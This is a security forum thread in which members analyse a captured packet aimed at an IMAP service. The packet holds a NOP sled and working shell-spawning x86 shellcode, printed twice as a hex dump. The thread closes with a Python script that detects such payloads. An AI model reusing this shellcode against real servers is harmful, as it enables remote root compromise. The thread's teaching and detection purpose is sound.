bsdjunkie
March 18th, 2003, 21:14
Ok, yet another easy one.... What can you tell from this capture? What's the attacker trying to exploit? What's the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

schotty
March 19th, 2003, 02:51
Ok, yet another easy one.... What can you tell from this capture? What's the attacker trying to exploit? What's the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

Hmm not sure, but this would make me very suspicious without knowing more info. 0x90 is M^P which when sent to /bin/sh should IIRC do a previous command executed. So unless someone is telnetted in legitimately, there are possible problems ;D

bsdjunkie
March 24th, 2003, 12:39
No one else has any ideas/input on this?

Strog
March 24th, 2003, 22:57
0x90 in hex is the NOP code used in Intel-based remote buffer overflow attacks.

My guess is a buffer overflow attempt on the imap service at 10:27pm. That's the best I can do at the moment. I really need to educate myself better in this area.

:roll:

schotty
March 24th, 2003, 23:49
I really need to educate myself better in this area.


Don't feel alone ;D As you may have noticed, I am not exactly God in Net Security.


BTW, how the hell close was I ?

bsdjunkie
March 25th, 2003, 12:30
Strog has it right. This was a buffer overflow attempt against port 143 which runs the IMAP daemon. As you can see the attacker is trying to get a root shell. The 0x90 are NOPs and this is commonly referred to as a NOP Sled.

A NOP sled is a series of no-operation instructions in the machine code of the target architecture. This series is often used as part of a buffer overflow technique, where the return address in the call stack is modified to point to exploit code. By using a NOP sled, the precise address of the exploit code need not be known; instead, an address in the middle of the NOPs is chosen, causing execution to slide into the exploit code.
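The two things bsdjunkie points to in the capture, a long run of 0x90 bytes and a "/bin/sh" string in the payload, are exactly what a simple payload inspector can flag. The script below is an added example written for this thread, not code from the original posters or from any IDS; it parses the hex dump as printed above (the 16 hex pairs per line, ignoring the ASCII column, is an assumption about the dump layout), finds the longest contiguous run of NOPs, counts the "CD 80" (int 0x80 syscall) byte pairs, and pulls out any printable strings. The threshold `min_sled` and the field names are choices made for this example. Note that a run of 0x90 on its own is a weak signal, since binary attachments pushed through IMAP can legitimately contain such bytes; the example therefore only marks a payload suspicious when the sled appears together with a shell string or a syscall stub.

```python
import re

# Constructed copy of the payload dump quoted in the thread (hex and ASCII columns).
SAMPLE_DUMP = """\
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........
"""

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def parse_hexdump(dump: str) -> bytes:
    """Convert a 16-bytes-per-line dump into raw bytes.

    Assumption: each line starts with up to 16 hex pairs followed by the
    ASCII rendering. Parsing stops at the first token that is not a hex pair
    or once 16 pairs have been read, so the ASCII column is skipped.
    """
    out = bytearray()
    for line in dump.splitlines():
        pairs = []
        for tok in line.split():
            if len(pairs) == 16 or not HEX_PAIR.fullmatch(tok):
                break
            pairs.append(tok)
        out.extend(int(h, 16) for h in pairs)
    return bytes(out)


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest contiguous run of `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII (0x20..0x7E) at least `min_len` long."""
    found, cur = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            found.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        found.append(cur.decode("ascii"))
    return found


def analyze_payload(data: bytes, nop: int = 0x90, min_sled: int = 8) -> dict:
    """Heuristic check for a NOP sled plus shellcode indicators in one payload."""
    sled = longest_run(data, nop)
    strings = extract_strings(data)
    findings = {
        "payload_len": len(data),
        "longest_nop_run": sled,
        "nop_fraction": data.count(nop) / len(data) if data else 0.0,
        "nop_sled": sled >= min_sled,
        # "CD 80" is the int 0x80 syscall stub on 32-bit Linux x86.
        "int80_count": data.count(b"\xcd\x80"),
        "shell_string": any("/bin/sh" in s for s in strings),
        "strings": strings,
    }
    # A sled alone is weak evidence; require a second indicator before alerting.
    findings["suspicious"] = findings["nop_sled"] and (
        findings["shell_string"] or findings["int80_count"] > 0
    )
    return findings


if __name__ == "__main__":
    report = analyze_payload(parse_hexdump(SAMPLE_DUMP))
    for key, value in report.items():
        print(f"{key:>16}: {value}")
```

Run on the dump from the thread, the longest NOP run is 20 bytes (the 0x90s at the end of the fourth line join those at the start of the fifth), two int 0x80 stubs are present, and "/bin/sh" is the only printable string, so the payload is flagged.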